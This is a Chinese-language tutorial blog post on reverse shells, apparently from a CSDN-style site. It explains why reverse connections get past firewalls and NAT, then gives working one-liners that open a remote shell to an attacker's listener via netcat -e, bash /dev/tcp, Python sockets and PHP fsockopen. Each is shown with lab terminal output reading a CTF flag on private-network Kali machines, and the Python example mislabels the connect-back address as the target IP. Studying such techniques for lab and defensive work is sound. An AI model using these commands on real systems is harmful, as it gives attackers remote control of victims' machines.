反弹shell:
简介;
反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。
正向连接:
假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。
反向连接:
反弹shell通常适用于如下几种情况:
- 目标机因防火墙受限,目标机器只能发送请求,不能接收请求。
- 目标机端口被占用。
- 目标机位于局域网,或IP会动态变化,攻击机无法直接连接。
- 对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知的。
对于以上几种情况,我们是无法利用正向连接的,要用反向连接。
反向连接就是攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,即为反向连接。
利用netcat反弹shell:
目前,默认的各个linux发行版本已经自带了netcat工具包,但是可能由于处于安全考虑原生版本的netcat带有可以直接发布与反弹本地shell的功能参数 -e 都被阉割了,所以我们需要自己手动下载二进制安装包,安装的如下:
wget https://nchc.dl.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1.tar.gz
tar -xvzf netcat-0.7.1.tar.gz
./configure
make && make install
make clean
安装完原生版本的 netcat 工具后,便有了netcat -e参数,我们就可以将本地bash反弹到攻击机上了。
攻击机开启本地监听:
netcat -lvvp 2333
目标机主动连接攻击机:
netcat <攻击机的IP> 2333 -e /bin/bash
结果:
首先,我在目标机的根目录存放了一个flag文件,之后我尝试在攻击机上读取这个文件:
┌──(root㉿kali)-[~]
└─# cat /flag
flag{Nice_Try_You_Get_The_flag}
之后,我们尝试在攻击机上读取flag文件:
┌──(root㉿kali)-[/home/kali/Desktop]
└─# netcat -lvvp 2333
listening on [any] 2333 ...
Warning: forward host lookup failed for bogon: Unknown host
connect to [192.168.209.137] from bogon [192.168.209.130] 39610
cat /flag
flag{Nice_Try_You_Get_The_flag}
qwe
ca][
首先在攻击机上监听了一下 2333 端口,然后用目标机建立连接,这个时候,我们发现成功读取了flag文件,后面我还尝试了几个错误的命令,在目标机器上输出了错误信息。
┌──(root㉿kali)-[~]
└─# netcat 192.168.209.137 2333 -e /bin/bash
bash: line 2: qwe: command not found
bash: line 3: ca][: command not found
利用Bash反弹shell
直接放代码:
bash -i >& /dev/tcp/<攻击机IP>/2333 0>&1
或
bash -c "bash -i >& /dev/tcp/<攻击机IP>/2333 0>&1"
- bash -i 打开一个交互的bash
- >& 将标准错误输出重定向到标准输出
- /dev/tcp/x.x.x.x/port 意为调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip,port为端口
- 0>&1 标准输入重定向到标准输出,实现你与反弹出来的shell的交互
攻击机开启本地监听:
nc -lvvp 2333
目标机主动连接攻击机:
bash -i >& /dev/tcp/<攻击机IP>/2333 0>&1
结果:
攻击机上,我们尝试读取了下文件:
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lvvp 2333
listening on [any] 2333 ...
Warning: forward host lookup failed for bogon: Unknown host
connect to [192.168.209.137] from bogon [192.168.209.130] 54426
┌──(root㉿kali)-[~]
└─# cat /flag
cat /flag
flag{Nice_Try_You_Get_The_flag}
┌──(root㉿kali)-[~]
└─# qwe
qwe
bash: qwe: command not found
不过这两个系统都是kali,倒不是很容易看出来区别是啥?不过,还是把flag给都出来了,对了,第一个交互和第二个交互所在的文件夹不同了,这里应该能区分吧。
接下来看看目标机:
┌──(root㉿kali)-[~]
└─# bash -c "bash -i >& /dev/tcp/192.168.209.137/2333 0>&1"
发现,没有任何输出,连胡乱输入的命令的报错都没有,说明真的重定向了。
Python 脚本反弹shell:
当目标主机上有python环境时,我们可以用Python来反弹shell。Python在现在一般发行版Linux系统中都会自带,所以使用起来也较为方便,即使没有安装,我们手动安装也很方便。
攻击机开启本地监听:
nc -lvvp 2333
目标机主动连接攻击机:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<目标机IP>",2333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
结果:
先看看攻击机的情况吧,这里很明显能看出来被攻击了,还是/bin/sh这个shell:
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lvvp 2333
listening on [any] 2333 ...
Warning: forward host lookup failed for bogon: Unknown host
connect to [192.168.209.137] from bogon [192.168.209.130] 46622
# ls
# cat /flag
flag{Nice_Try_You_Get_The_flag}
目标机器也是,啥输出都没有:
┌──(root㉿kali)-[~]
└─# python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.209.137",2333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
php 脚本反弹shell:
当然,CTF中最经典的 PHP 不能忘了,老样子,
攻击机监听端口:
nc -lvvp 2333
目标机器运行php脚本:
php -r '$sock=fsockopen("<攻击机IP地址>",2333);exec("/bin/sh -i <&3 >&3 2>&3");'
结果:
攻击机成功读取到了flag:
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lvvp 2333
listening on [any] 2333 ...
Warning: forward host lookup failed for bogon: Unknown host
connect to [192.168.209.137] from bogon [192.168.209.130] 36986
# cat /flag
flag{Nice_Try_You_Get_The_flag}
目标机器也没有任何输出:
┌──(root㉿kali)-[~]
└─# php -r '$sock=fsockopen("192.168.209.137",2333);exec("/bin/sh -i <&3 >&3 2>&3");'
1361
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
